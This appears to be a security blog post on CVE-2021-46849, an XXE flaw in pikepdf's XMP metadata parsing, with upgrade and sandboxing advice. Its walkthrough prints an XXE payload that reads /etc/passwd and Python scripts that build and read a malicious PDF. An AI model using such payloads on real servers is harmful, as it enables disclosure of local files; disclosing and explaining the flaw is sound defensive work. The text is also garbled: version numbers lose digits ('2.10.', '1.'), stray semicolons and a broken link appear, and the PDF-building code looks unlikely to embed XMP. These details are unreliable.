CVE-2021-46849 - XXE Vulnerability in pikepdf's XMP Metadata Parsing (Before v2.10.) - Deep Dive, Exploit Details, and How to Stay Safe

In the world of PDF processing, Python's pikepdf library has made a name for itself as a go-to tool for working with PDF files. But just like any piece of software, it's not immune to security flaws. One particular flaw, tracked as CVE-2021-46849, could let attackers pull off an XXE (XML External Entity) attack when handling PDF files with embedded XMP metadata. If your application uses pikepdf version before 2.10., you might be at risk.

This post goes deep into how the bug works, demonstrates a basic exploit, and gives direct advice to keep your systems safe.

In a Nutshell

- Library Affected: pikepdf

Versions: All versions before 2.10.

- Problem: When pikepdf reads XMP metadata from a PDF, it doesn't properly restrict XML features, allowing XML External Entity (XXE) attacks.
- Impact: Remote attackers can get your server to fetch local files (like /etc/passwd), make unwanted HTTP requests, or leak information.

Official References

- GitHub Security Advisory GHSA-63mv-9g85-w387
- CVE entry on NVD
- pikepdf Release Notes – 2.10.

Understanding XXE Vulnerabilities

XXE, or *XML External Entity* attack, is a classic trick that takes advantage of how some XML parsers load and interpret entities within XML data. If not properly configured, an XML parser will allow the input document to reference external resources, possibly even files on the host machine.

In pikepdf, this risk comes into play when reading PDF files containing XMP (Extensible Metadata Platform) metadata—a chunk of XML stored inside your PDF. If your app reads or exposes this metadata, it might inadvertently give attackers a way to read files from your server.

The Problem

Here’s the basic risk: Any time pikepdf (before v2.10.) loads XMP metadata, it passes that XML to a parser that supports external entities. Maliciously crafted XMP can direct pikepdf to load data from the server's filesystem or even remote targets.

Exploit Walkthrough

Let’s say an attacker has a way to upload or submit PDFs to your server, and your backend processes them with pikepdf to read XMP.

A malicious PDF's XMP might look like

<?xml version="1."?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<x:xmpmeta xmlns:x="adobe:ns:meta/">
  <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">;
    <rdf:Description>
      <dangerField>&xxe;</dangerField>
    </rdf:Description>
  </rdf:RDF>
</x:xmpmeta>

When pikepdf loads this PDF and parses the XMP, &xxe; will be replaced by the contents of /etc/passwd.

Assuming a server endpoint that does something like this

import pikepdf

def extract_xmp(pdf_path):
    with pikepdf.open(pdf_path) as pdf:
        xmp_xml = pdf.open_metadata()
        return xmp_xml['rdf:Description']['dangerField']

If an attacker submits a PDF with the above malicious XMP, the code will leak the target server's /etc/passwd content.

Step 1: Create a malicious PDF

You can use exiftool to inject arbitrary XMP metadata, but here's a simplified Python snippet using PyPDF2 (you can adapt this for your use):

from PyPDF2 import PdfWriter

pdf = PdfWriter()
pdf.add_blank_page(width=72, height=72)

evil_xmp = '''<?xml version="1."?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<x:xmpmeta xmlns:x="adobe:ns:meta/">
  <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">;
    <rdf:Description>
      <dangerField>&xxe;</dangerField>
    </rdf:Description>
  </rdf:RDF>
</x:xmpmeta>
'''

pdf.add_metadata({'/xmp': evil_xmp})
with open("evil.pdf", "wb") as f:
    pdf.write(f)

Step 2: Read with old pikepdf

import pikepdf

with pikepdf.open('evil.pdf') as pdf:
    xmp = pdf.open_metadata()
    # The xmp object is an lxml object, so you can directly search, print, etc.
    print(xmp['rdf:Description']['dangerField'])

If you run this with a vulnerable pikepdf (<2.10.), it will print your /etc/passwd!

Upgrade!

- Fastest Fix: Upgrade to pikepdf 2.10. or later. This version disables external entity expansion when parsing XMP.

Containerization

- Consider running PDF-processing code in a limited container or VM with no network/file access, so even if hit by a future XXE, the damage is limited.

Bottom Line

If your app processes PDFs from untrusted sources—and especially if you inspect their metadata—this bug matters! Upgrade pikepdf *now* and audit your code paths. Don’t let a simple metadata read open your server to file leaks.

Additional Resources and References

- CVE-2021-46849 - NVD
- pikepdf GitHub Advisory
- Understanding XXE_Processing)
- pikepdf 2.10. Release

Stay Secure! If you use Python for PDF processing, keep your libraries up to date, and watch for these kinds of problems in all libraries that handle XML or other user-controlled data.

Timeline

Published on: 10/24/2022 14:15:00 UTC
Last modified on: 10/24/2022 16:15:00 UTC